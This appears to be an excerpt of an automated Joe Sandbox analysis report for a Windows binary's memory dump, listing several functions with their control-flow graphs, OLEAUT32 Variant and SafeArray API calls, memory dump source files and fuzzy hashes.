                                                                      control_flow_graph 370 6f0baf30-6f0baf95 VariantInit * 3 371 6f0bafa1-6f0bafa7 370->371 372 6f0baf97-6f0baf9c call 6f11c1e0 370->372 374 6f0bafa9-6f0bafae 371->374 375 6f0bafb1-6f0bafc4 371->375 372->371 374->375 377 6f0bafca-6f0bafda call 6f0c38e0 375->377 378 6f0bb22c-6f0bb252 VariantClear * 3 375->378 377->378 385 6f0bafe0-6f0baff4 377->385 380 6f0bb25c-6f0bb26a 378->380 381 6f0bb254-6f0bb257 378->381 383 6f0bb26c-6f0bb271 380->383 384 6f0bb274-6f0bb288 380->384 381->380 383->384 386 6f0baffe-6f0bb015 VariantCopy 385->386 387 6f0baff6-6f0baff9 385->387 388 6f0bb01d-6f0bb033 VariantClear 386->388 389 6f0bb017-6f0bb018 call 6f11c1e0 386->389 387->386 391 6f0bb03f-6f0bb050 388->391 392 6f0bb035-6f0bb03a call 6f11c1e0 388->392 389->388 394 6f0bb052-6f0bb054 391->394 395 6f0bb056-6f0bb058 391->395 392->391 396 6f0bb05b-6f0bb05f 394->396 395->396 397 6f0bb061-6f0bb063 396->397 398 6f0bb065 396->398 399 6f0bb067-6f0bb0a1 397->399 398->399 399->378 401 6f0bb0a7-6f0bb0b3 call 6f109bb5 399->401 404 6f0bb0c1 401->404 405 6f0bb0b5-6f0bb0bf 401->405 406 6f0bb0c3-6f0bb0ca 404->406 405->406 407 6f0bb0d0-6f0bb0d9 406->407 407->407 408 6f0bb0db-6f0bb111 call 6f1091e1 call 6f10a136 407->408 413 6f0bb11d-6f0bb12b 408->413 414 6f0bb113-6f0bb118 call 6f11c1e0 408->414 416 6f0bb12d-6f0bb12f 413->416 417 6f0bb131-6f0bb133 413->417 414->413 418 6f0bb136-6f0bb13a 416->418 417->418 419 6f0bb13c-6f0bb13e 418->419 420 6f0bb140 418->420 421 6f0bb142-6f0bb174 419->421 420->421 422 6f0bb17c-6f0bb17e 421->422 423 6f0bb1ff-6f0bb203 422->423 424 6f0bb180-6f0bb18a 422->424 425 6f0bb210-6f0bb215 423->425 426 6f0bb205-6f0bb20e call 6f109c35 423->426 427 6f0bb28d-6f0bb2b8 VariantClear * 3 424->427 428 6f0bb190-6f0bb1b9 SafeArrayGetLBound SafeArrayGetUBound 424->428 432 6f0bb223-6f0bb229 call 6f109b35 425->432 433 6f0bb217-6f0bb220 call 6f109c35 425->433 426->425 430 6f0bb2ba-6f0bb2bf 427->430 431 6f0bb2c2-6f0bb2d0 427->431 434 6f0bb28b 428->434 435 6f0bb1bf-6f0bb1cd SafeArrayAccessData 428->435 430->431 438 6f0bb2da-6f0bb2ee 431->438 439 6f0bb2d2-6f0bb2d7 431->439 432->378 433->432 434->427 435->434 441 6f0bb1d3-6f0bb1f7 call 6f1091e1 call 6f10a530 SafeArrayUnaccessData 435->441 439->438 441->434 448 6f0bb1fd 441->448 448->423
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0BAF75
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0BAF7C
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0BAF83
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 6F0BB00D
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0BB027
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F0BB19C
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0BB1AA
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 6F0BB1C5
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 6F0BB1EF
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0BB237
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0BB23E
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0BB245
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0BB29D
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0BB2A4
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0BB2AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess
                                                                      • String ID:
                                                                      • API String ID: 1795507694-0
                                                                      • Opcode ID: 9fc5d45a605cc7d70d80cf986cce04d039ef1fe151a1ccdfff9556df414637c6
                                                                      • Instruction ID: e8c48c7a281176ffcc4593fd33119695e7d9b5b2336dc50aa6617dc81da140bd
                                                                      • Opcode Fuzzy Hash: 9fc5d45a605cc7d70d80cf986cce04d039ef1fe151a1ccdfff9556df414637c6
                                                                      • Instruction Fuzzy Hash: 12C169B26083419FD700DFA8C8C4A5AB7E9FF89344F50892DF659C7290DB31E945CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CD410 Relevance: 22.8, APIs: 15, Instructions: 290COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 449 6f0cd410-6f0cd44c 450 6f0cd44e-6f0cd465 449->450 451 6f0cd472-6f0cd4e0 VariantInit * 3 449->451 452 6f0cd4ec-6f0cd4f2 451->452 453 6f0cd4e2-6f0cd4ea 451->453 454 6f0cd4f6-6f0cd504 452->454 453->454 455 6f0cd51e-6f0cd527 454->455 456 6f0cd506-6f0cd50d 454->456 459 6f0cd538-6f0cd53c 455->459 460 6f0cd529-6f0cd530 455->460 457 6f0cd50f-6f0cd512 456->457 458 6f0cd514-6f0cd516 456->458 462 6f0cd518-6f0cd51c 457->462 458->462 461 6f0cd540-6f0cd544 459->461 460->459 463 6f0cd532-6f0cd536 460->463 464 6f0cd54a-6f0cd5c0 call 6f109d66 SafeArrayCreateVector * 2 SafeArrayAccessData 461->464 465 6f0cd704-6f0cd72f VariantClear * 3 461->465 462->455 462->456 463->461 474 6f0cd5c6-6f0cd5ea call 6f10a530 SafeArrayUnaccessData 464->474 475 6f0cd5c2-6f0cd5c4 464->475 467 6f0cd76c-6f0cd783 465->467 468 6f0cd731-6f0cd757 465->468 470 6f0cd75d 468->470 471 6f0cd470 468->471 473 6f0cd762-6f0cd767 call 6f11c1e0 470->473 471->451 473->467 477 6f0cd5ec-6f0cd605 SafeArrayPutElement 474->477 475->477 480 6f0cd60b-6f0cd629 477->480 481 6f0cd6e5-6f0cd6eb 477->481 482 6f0cd62b-6f0cd630 480->482 483 6f0cd633-6f0cd64f SafeArrayPutElement VariantClear 480->483 484 6f0cd6ed-6f0cd6f3 call 6f109d2c 481->484 485 6f0cd6f6-6f0cd6f8 481->485 482->483 483->481 486 6f0cd655-6f0cd664 483->486 484->485 487 6f0cd6fa-6f0cd6fb SafeArrayDestroy 485->487 488 6f0cd701 485->488 486->473 491 6f0cd66a-6f0cd69b 486->491 487->488 488->465 491->481 493 6f0cd69d-6f0cd6a9 491->493 493->481 494 6f0cd6ab-6f0cd6c1 call 6f0bdb30 493->494 494->481 497 6f0cd6c3-6f0cd6d5 call 6f0c56b0 call 6f0c6880 494->497 501 6f0cd6da-6f0cd6e0 497->501 501->481
                                                                      APIs
                                                                      • VariantInit.OLEAUT32 ref: 6F0CD4B3
                                                                      • VariantInit.OLEAUT32 ref: 6F0CD4C5
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CD4CC
                                                                      • _malloc.LIBCMT ref: 6F0CD551
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F0CD58B
                                                                      • SafeArrayCreateVector.OLEAUT32 ref: 6F0CD5A6
                                                                      • SafeArrayAccessData.OLEAUT32 ref: 6F0CD5B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
                                                                      • String ID:
                                                                      • API String ID: 1552365394-0
                                                                      • Opcode ID: 98c5d73f52bdb10c53a22c59032173434d7c4bc49e93ee5e346361331b2aa4a9
                                                                      • Instruction ID: f4c6e91c9c9cc1770f00553ce7041e7502b384d26d673e29410f83f2ce3de336
                                                                      • Opcode Fuzzy Hash: 98c5d73f52bdb10c53a22c59032173434d7c4bc49e93ee5e346361331b2aa4a9
                                                                      • Instruction Fuzzy Hash: 14B145766083009FD714CF68C880B5BB7E9FF89314F14895DE9A597391EB31E905CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C44C0 Relevance: 19.8, APIs: 13, Instructions: 261COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C44FF
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C4505
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F0C4516
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F0C4551
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C455A
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6F0C4579
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F0C4594
                                                                      • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6F0C45B5
                                                                      • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6F0C45CE
                                                                      • std::tr1::_Xweak.LIBCPMT ref: 6F0C475A
                                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 6F0C4777
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4787
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C478D
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
                                                                      • String ID:
                                                                      • API String ID: 1304965753-0
                                                                      • Opcode ID: 42c91237aadc7d7861ce4ac9afd9e1df1bc078167b14da6a17d08a7d9690543d
                                                                      • Instruction ID: 73201ef9e0225003e08deaad7cfdfb0aecb8a7f08a1aea9972ba4dcbc54244c9
                                                                      • Opcode Fuzzy Hash: 42c91237aadc7d7861ce4ac9afd9e1df1bc078167b14da6a17d08a7d9690543d
                                                                      • Instruction Fuzzy Hash: 22A12B75A00606ABDB14DBA5C984EEFB7B9FF8C710F14462DE506AB781CA30F941CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C5140 Relevance: 19.7, APIs: 13, Instructions: 203COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C5177
                                                                        • Part of subcall function 6F0D2820: _malloc.LIBCMT ref: 6F0D2871
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6F0C51B9
                                                                      • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6F0C51D5
                                                                      • SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6F0C51E5
                                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F0C5208
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F0C522C
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6F0C5263
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C526C
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6F0C52AD
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C52B6
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6F0C52D2
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0C534E
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C5358
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc
                                                                      • String ID:
                                                                      • API String ID: 4170690753-0
                                                                      • Opcode ID: 17e213204fb7d29086fcf2c01f09603ee9f8f24719cb36407fe264795fbc1f93
                                                                      • Instruction ID: 4dbed08b96f5be0e334eb99a114f0ce096692d16c88bd18b9c6d9b6087e4cce9
                                                                      • Opcode Fuzzy Hash: 17e213204fb7d29086fcf2c01f09603ee9f8f24719cb36407fe264795fbc1f93
                                                                      • Instruction Fuzzy Hash: CA7139B5A0060AEFDB00CFA8C884BAFBBB8FF49354F00811AE90597241D774E955CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CBF00 Relevance: 18.2, APIs: 12, Instructions: 215COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Init$Clear$Copy
                                                                      • String ID:
                                                                      • API String ID: 3833040332-0
                                                                      • Opcode ID: df62fe9224a2147a2033b5b4643eba548925717ea893cbc30dd37e263221b1d1
                                                                      • Instruction ID: 8c47ff94a9db25104f3d972dc105cee3bfc0e0d51234d1abf3f65e27e508c816
                                                                      • Opcode Fuzzy Hash: df62fe9224a2147a2033b5b4643eba548925717ea893cbc30dd37e263221b1d1
                                                                      • Instruction Fuzzy Hash: B4819A71900259AFDB04DFA8CC84FEEBBB9FF49304F14855DE905AB280DB35A905CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C64D0 Relevance: 18.2, APIs: 12, Instructions: 159COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VariantInit.OLEAUT32 ref: 6F0C650C
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C6519
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C6520
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6F0C6531
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0C656D
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C6576
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0C65B6
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C65BF
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0C6666
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C6677
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C667E
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C6685
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                                                      • String ID:
                                                                      • API String ID: 1625659656-0
                                                                      • Opcode ID: 045288d59962eba48dcacb5c6a91e9ae83c9379f0f95a9a39292470ee1503093
                                                                      • Instruction ID: ecda852b807c79f6f25f2fc7627ba69aa3941f175df184546b20d0c0f9eff9ee
                                                                      • Opcode Fuzzy Hash: 045288d59962eba48dcacb5c6a91e9ae83c9379f0f95a9a39292470ee1503093
                                                                      • Instruction Fuzzy Hash: AF513972108705AFC710DF68C880A6BBBF8EFCA710F108A1EF99597251DB71E905CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CCB90 Relevance: 18.1, APIs: 12, Instructions: 143COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CCBCA
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CCBD3
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F0CCBE4
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F0CCBF6
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0CCC0D
                                                                      • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6F0CCC39
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CCC42
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6F0CCC5D
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6F0CCC77
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0CCCEC
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CCCFC
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CCD02
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
                                                                      • String ID:
                                                                      • API String ID: 3548156019-0
                                                                      • Opcode ID: 1c4f1e4cca312cd83b2c39f93d8b7b326025863d26278aa75b72e8e7ce2fb4f6
                                                                      • Instruction ID: 495df0c650b339e4a28da6b07106ea47ab73966924c9d20fff623590e0cb362f
                                                                      • Opcode Fuzzy Hash: 1c4f1e4cca312cd83b2c39f93d8b7b326025863d26278aa75b72e8e7ce2fb4f6
                                                                      • Instruction Fuzzy Hash: BE512EB5D00249AFDB00DFA4C884EEEBBB8FF49750F00816EEA15A7341D771A955CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BA350 Relevance: 16.7, APIs: 11, Instructions: 206COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 649 6f0ba350-6f0ba3bd VariantInit * 3 call 6f0c38e0 652 6f0ba3c3-6f0ba3d6 649->652 653 6f0ba505-6f0ba528 VariantClear * 3 649->653 656 6f0ba3d8-6f0ba3dd 652->656 657 6f0ba3e0-6f0ba3f7 VariantCopy 652->657 654 6f0ba52a-6f0ba52d 653->654 655 6f0ba532-6f0ba546 653->655 654->655 656->657 658 6f0ba3f9-6f0ba3fa call 6f11c1e0 657->658 659 6f0ba3ff-6f0ba411 VariantClear 657->659 658->659 661 6f0ba41d-6f0ba42b 659->661 662 6f0ba413-6f0ba418 call 6f11c1e0 659->662 663 6f0ba42d-6f0ba42f 661->663 664 6f0ba431-6f0ba433 661->664 662->661 666 6f0ba436-6f0ba43a 663->666 664->666 667 6f0ba43c-6f0ba43e 666->667 668 6f0ba440 666->668 669 6f0ba442-6f0ba477 667->669 668->669 670 6f0ba47c-6f0ba47e 669->670 670->653 671 6f0ba484-6f0ba493 670->671 672 6f0ba49f-6f0ba4b0 671->672 673 6f0ba495-6f0ba49a call 6f11c1e0 671->673 675 6f0ba4b2-6f0ba4b4 672->675 676 6f0ba4b6-6f0ba4b8 672->676 673->672 677 6f0ba4bb-6f0ba4bf 675->677 676->677 678 6f0ba4c1-6f0ba4c3 677->678 679 6f0ba4c5 677->679 680 6f0ba4c7-6f0ba503 678->680 679->680 680->653 682 6f0ba549-6f0ba578 VariantClear * 3 680->682 683 6f0ba57a-6f0ba57f 682->683 684 6f0ba582-6f0ba596 682->684 683->684
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$Init$Copy
                                                                      • String ID:
                                                                      • API String ID: 3214764494-0
                                                                      • Opcode ID: 7453c10d205e40d8fdbe2438ea195b89ca000fa077afc05647bd3af3e1751105
                                                                      • Instruction ID: addf75615f41d885c793c4e61407fec9b8e9700f673065809376876654a2cc9c
                                                                      • Opcode Fuzzy Hash: 7453c10d205e40d8fdbe2438ea195b89ca000fa077afc05647bd3af3e1751105
                                                                      • Instruction Fuzzy Hash: 787137726083419FD700DF69C980B5AB7E8FF89750F108A6DFA55DB291DB31E904CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

